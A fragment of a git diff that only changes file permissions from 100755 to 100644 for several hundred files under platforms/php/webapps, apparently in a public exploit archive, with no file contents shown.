b/platforms/php/webapps/5239.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5240.htm b/platforms/php/webapps/5240.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5241.txt b/platforms/php/webapps/5241.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5242.txt b/platforms/php/webapps/5242.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5243.txt b/platforms/php/webapps/5243.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5244.txt b/platforms/php/webapps/5244.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5245.txt b/platforms/php/webapps/5245.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5246.txt b/platforms/php/webapps/5246.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5247.txt b/platforms/php/webapps/5247.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5252.txt b/platforms/php/webapps/5252.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5253.txt b/platforms/php/webapps/5253.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5254.txt b/platforms/php/webapps/5254.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5255.txt b/platforms/php/webapps/5255.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5260.txt b/platforms/php/webapps/5260.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5262.txt b/platforms/php/webapps/5262.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5263.txt b/platforms/php/webapps/5263.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5265.txt b/platforms/php/webapps/5265.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5266.txt b/platforms/php/webapps/5266.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5267.txt b/platforms/php/webapps/5267.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5273.txt b/platforms/php/webapps/5273.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5275.txt b/platforms/php/webapps/5275.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5277.txt b/platforms/php/webapps/5277.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5278.txt b/platforms/php/webapps/5278.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5279.txt b/platforms/php/webapps/5279.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5280.txt b/platforms/php/webapps/5280.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5281.php b/platforms/php/webapps/5281.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5285.txt b/platforms/php/webapps/5285.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5288.txt b/platforms/php/webapps/5288.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5290.txt b/platforms/php/webapps/5290.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5291.txt b/platforms/php/webapps/5291.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5294.txt b/platforms/php/webapps/5294.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5296.txt b/platforms/php/webapps/5296.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5297.txt b/platforms/php/webapps/5297.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5299.txt b/platforms/php/webapps/5299.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5300.txt b/platforms/php/webapps/5300.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5301.txt b/platforms/php/webapps/5301.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5302.txt b/platforms/php/webapps/5302.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5303.txt b/platforms/php/webapps/5303.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5308.txt b/platforms/php/webapps/5308.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5309.txt b/platforms/php/webapps/5309.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5310.txt b/platforms/php/webapps/5310.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5311.txt b/platforms/php/webapps/5311.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5312.txt b/platforms/php/webapps/5312.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5317.txt b/platforms/php/webapps/5317.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5318.txt b/platforms/php/webapps/5318.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5322.txt b/platforms/php/webapps/5322.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5324.txt b/platforms/php/webapps/5324.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5325.txt b/platforms/php/webapps/5325.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5326.txt b/platforms/php/webapps/5326.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5328.txt b/platforms/php/webapps/5328.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5329.txt b/platforms/php/webapps/5329.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5333.txt b/platforms/php/webapps/5333.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5334.txt b/platforms/php/webapps/5334.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5335.txt b/platforms/php/webapps/5335.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5337.txt b/platforms/php/webapps/5337.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5339.php b/platforms/php/webapps/5339.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5340.txt b/platforms/php/webapps/5340.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5345.txt b/platforms/php/webapps/5345.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5347.txt b/platforms/php/webapps/5347.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5348.txt b/platforms/php/webapps/5348.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5350.txt b/platforms/php/webapps/5350.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5351.txt b/platforms/php/webapps/5351.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5352.txt b/platforms/php/webapps/5352.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5353.txt b/platforms/php/webapps/5353.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5359.txt b/platforms/php/webapps/5359.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5360.txt b/platforms/php/webapps/5360.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5362.txt b/platforms/php/webapps/5362.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5363.txt b/platforms/php/webapps/5363.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5364.txt b/platforms/php/webapps/5364.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5365.txt b/platforms/php/webapps/5365.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5368.txt b/platforms/php/webapps/5368.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5369.txt b/platforms/php/webapps/5369.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5370.txt b/platforms/php/webapps/5370.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5371.txt b/platforms/php/webapps/5371.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5372.txt b/platforms/php/webapps/5372.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5374.txt b/platforms/php/webapps/5374.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5375.txt b/platforms/php/webapps/5375.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5377.txt b/platforms/php/webapps/5377.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5378.txt b/platforms/php/webapps/5378.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5379.txt b/platforms/php/webapps/5379.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5380.txt b/platforms/php/webapps/5380.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5381.txt b/platforms/php/webapps/5381.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5382.txt b/platforms/php/webapps/5382.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5383.txt b/platforms/php/webapps/5383.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5384.txt b/platforms/php/webapps/5384.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5385.txt b/platforms/php/webapps/5385.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5387.txt b/platforms/php/webapps/5387.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5388.txt b/platforms/php/webapps/5388.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5389.txt b/platforms/php/webapps/5389.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5390.txt b/platforms/php/webapps/5390.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5391.php b/platforms/php/webapps/5391.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5392.php b/platforms/php/webapps/5392.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5393.txt b/platforms/php/webapps/5393.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5394.txt b/platforms/php/webapps/5394.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5399.txt b/platforms/php/webapps/5399.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5400.txt b/platforms/php/webapps/5400.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5401.txt b/platforms/php/webapps/5401.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5402.txt b/platforms/php/webapps/5402.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5404.php b/platforms/php/webapps/5404.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5405.txt b/platforms/php/webapps/5405.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5406.txt b/platforms/php/webapps/5406.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5407.php b/platforms/php/webapps/5407.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5410.txt b/platforms/php/webapps/5410.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5411.txt b/platforms/php/webapps/5411.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5412.txt b/platforms/php/webapps/5412.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5413.txt b/platforms/php/webapps/5413.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5414.txt b/platforms/php/webapps/5414.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5415.txt b/platforms/php/webapps/5415.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5417.htm b/platforms/php/webapps/5417.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5419.txt b/platforms/php/webapps/5419.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5420.txt b/platforms/php/webapps/5420.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5421.txt b/platforms/php/webapps/5421.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5423.txt b/platforms/php/webapps/5423.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5426.txt b/platforms/php/webapps/5426.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5428.txt b/platforms/php/webapps/5428.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5429.txt b/platforms/php/webapps/5429.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5431.txt b/platforms/php/webapps/5431.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5432.txt b/platforms/php/webapps/5432.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5433.txt b/platforms/php/webapps/5433.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5435.txt b/platforms/php/webapps/5435.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5436.txt b/platforms/php/webapps/5436.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5437.txt b/platforms/php/webapps/5437.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5439.txt b/platforms/php/webapps/5439.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5440.php b/platforms/php/webapps/5440.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5441.txt b/platforms/php/webapps/5441.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5443.txt b/platforms/php/webapps/5443.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5444.txt b/platforms/php/webapps/5444.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5446.txt b/platforms/php/webapps/5446.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5447.txt b/platforms/php/webapps/5447.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5448.txt b/platforms/php/webapps/5448.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5449.php b/platforms/php/webapps/5449.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5450.txt b/platforms/php/webapps/5450.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5452.txt b/platforms/php/webapps/5452.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5454.txt b/platforms/php/webapps/5454.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5457.txt b/platforms/php/webapps/5457.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5459.txt b/platforms/php/webapps/5459.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5463.txt b/platforms/php/webapps/5463.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5464.txt b/platforms/php/webapps/5464.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5465.txt b/platforms/php/webapps/5465.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5467.txt b/platforms/php/webapps/5467.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5468.txt b/platforms/php/webapps/5468.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5469.txt b/platforms/php/webapps/5469.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5471.txt b/platforms/php/webapps/5471.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5474.txt b/platforms/php/webapps/5474.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5476.txt b/platforms/php/webapps/5476.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5477.txt b/platforms/php/webapps/5477.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5478.txt b/platforms/php/webapps/5478.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5480.txt b/platforms/php/webapps/5480.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5481.txt b/platforms/php/webapps/5481.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5483.txt b/platforms/php/webapps/5483.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5484.txt b/platforms/php/webapps/5484.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5486.txt b/platforms/php/webapps/5486.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5487.txt b/platforms/php/webapps/5487.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5488.txt b/platforms/php/webapps/5488.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5491.txt b/platforms/php/webapps/5491.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5493.txt b/platforms/php/webapps/5493.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5494.txt b/platforms/php/webapps/5494.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5495.txt b/platforms/php/webapps/5495.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5497.txt b/platforms/php/webapps/5497.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5499.txt b/platforms/php/webapps/5499.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5500.txt b/platforms/php/webapps/5500.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5501.txt b/platforms/php/webapps/5501.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5504.txt b/platforms/php/webapps/5504.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5505.txt b/platforms/php/webapps/5505.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5506.txt b/platforms/php/webapps/5506.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5508.txt b/platforms/php/webapps/5508.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5509.txt b/platforms/php/webapps/5509.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5510.txt b/platforms/php/webapps/5510.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5516.txt b/platforms/php/webapps/5516.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5517.txt b/platforms/php/webapps/5517.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5520.txt b/platforms/php/webapps/5520.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5521.txt b/platforms/php/webapps/5521.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5522.txt b/platforms/php/webapps/5522.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5523.txt b/platforms/php/webapps/5523.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5524.txt b/platforms/php/webapps/5524.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5525.txt b/platforms/php/webapps/5525.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5526.txt b/platforms/php/webapps/5526.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5528.txt b/platforms/php/webapps/5528.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5529.txt b/platforms/php/webapps/5529.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5531.txt b/platforms/php/webapps/5531.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5532.txt b/platforms/php/webapps/5532.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5533.txt b/platforms/php/webapps/5533.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5535.txt b/platforms/php/webapps/5535.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5537.txt b/platforms/php/webapps/5537.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5538.txt b/platforms/php/webapps/5538.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5539.txt b/platforms/php/webapps/5539.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5541.txt b/platforms/php/webapps/5541.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5542.txt b/platforms/php/webapps/5542.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5543.txt b/platforms/php/webapps/5543.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5544.txt b/platforms/php/webapps/5544.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5545.txt b/platforms/php/webapps/5545.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5546.txt b/platforms/php/webapps/5546.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5548.txt b/platforms/php/webapps/5548.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5549.txt b/platforms/php/webapps/5549.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5550.php b/platforms/php/webapps/5550.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5551.txt b/platforms/php/webapps/5551.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5552.txt b/platforms/php/webapps/5552.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5554.php b/platforms/php/webapps/5554.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5555.txt b/platforms/php/webapps/5555.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5558.txt b/platforms/php/webapps/5558.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5559.txt b/platforms/php/webapps/5559.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5560.txt b/platforms/php/webapps/5560.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5566.txt b/platforms/php/webapps/5566.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5567.txt b/platforms/php/webapps/5567.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5568.txt b/platforms/php/webapps/5568.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5575.txt b/platforms/php/webapps/5575.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5577.txt b/platforms/php/webapps/5577.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5578.txt b/platforms/php/webapps/5578.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5579.htm b/platforms/php/webapps/5579.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5580.txt b/platforms/php/webapps/5580.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5581.txt b/platforms/php/webapps/5581.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5582.txt b/platforms/php/webapps/5582.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5583.php b/platforms/php/webapps/5583.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5586.txt b/platforms/php/webapps/5586.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5588.php b/platforms/php/webapps/5588.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5589.php b/platforms/php/webapps/5589.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5590.txt b/platforms/php/webapps/5590.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5591.txt b/platforms/php/webapps/5591.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5592.txt b/platforms/php/webapps/5592.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5594.txt b/platforms/php/webapps/5594.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5595.txt b/platforms/php/webapps/5595.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5596.txt b/platforms/php/webapps/5596.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5598.txt b/platforms/php/webapps/5598.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5599.txt b/platforms/php/webapps/5599.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5600.php b/platforms/php/webapps/5600.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5602.txt b/platforms/php/webapps/5602.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5603.txt b/platforms/php/webapps/5603.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5604.txt b/platforms/php/webapps/5604.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5605.txt b/platforms/php/webapps/5605.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5606.txt b/platforms/php/webapps/5606.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5607.txt b/platforms/php/webapps/5607.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5609.txt b/platforms/php/webapps/5609.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5610.txt b/platforms/php/webapps/5610.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5611.txt b/platforms/php/webapps/5611.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5613.txt b/platforms/php/webapps/5613.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5614.txt b/platforms/php/webapps/5614.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5615.txt b/platforms/php/webapps/5615.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5616.txt b/platforms/php/webapps/5616.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5617.txt b/platforms/php/webapps/5617.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5618.txt b/platforms/php/webapps/5618.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5620.txt b/platforms/php/webapps/5620.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5621.txt b/platforms/php/webapps/5621.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5623.txt b/platforms/php/webapps/5623.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5624.txt b/platforms/php/webapps/5624.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5626.txt b/platforms/php/webapps/5626.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5628.txt b/platforms/php/webapps/5628.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5629.txt b/platforms/php/webapps/5629.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5630.txt b/platforms/php/webapps/5630.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5631.txt b/platforms/php/webapps/5631.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5634.htm b/platforms/php/webapps/5634.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5636.txt b/platforms/php/webapps/5636.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5637.txt b/platforms/php/webapps/5637.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5638.txt b/platforms/php/webapps/5638.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5641.txt b/platforms/php/webapps/5641.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5642.txt b/platforms/php/webapps/5642.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5643.txt b/platforms/php/webapps/5643.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5644.txt b/platforms/php/webapps/5644.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5645.txt b/platforms/php/webapps/5645.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5646.txt b/platforms/php/webapps/5646.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5647.txt b/platforms/php/webapps/5647.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/565.txt b/platforms/php/webapps/565.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5651.txt b/platforms/php/webapps/5651.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5653.php b/platforms/php/webapps/5653.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5654.txt b/platforms/php/webapps/5654.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5656.txt b/platforms/php/webapps/5656.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5657.txt b/platforms/php/webapps/5657.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5658.txt b/platforms/php/webapps/5658.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5659.txt b/platforms/php/webapps/5659.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5660.txt b/platforms/php/webapps/5660.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5661.txt b/platforms/php/webapps/5661.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5663.txt b/platforms/php/webapps/5663.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5664.txt b/platforms/php/webapps/5664.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5665.txt b/platforms/php/webapps/5665.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5666.txt b/platforms/php/webapps/5666.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5668.txt b/platforms/php/webapps/5668.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5669.txt b/platforms/php/webapps/5669.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5670.txt b/platforms/php/webapps/5670.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5671.txt b/platforms/php/webapps/5671.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5672.txt b/platforms/php/webapps/5672.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5673.txt b/platforms/php/webapps/5673.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5674.txt b/platforms/php/webapps/5674.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5675.txt b/platforms/php/webapps/5675.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5676.txt b/platforms/php/webapps/5676.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5677.txt b/platforms/php/webapps/5677.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5678.txt b/platforms/php/webapps/5678.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5680.txt b/platforms/php/webapps/5680.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5683.txt b/platforms/php/webapps/5683.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5684.txt b/platforms/php/webapps/5684.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5685.txt b/platforms/php/webapps/5685.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5688.php 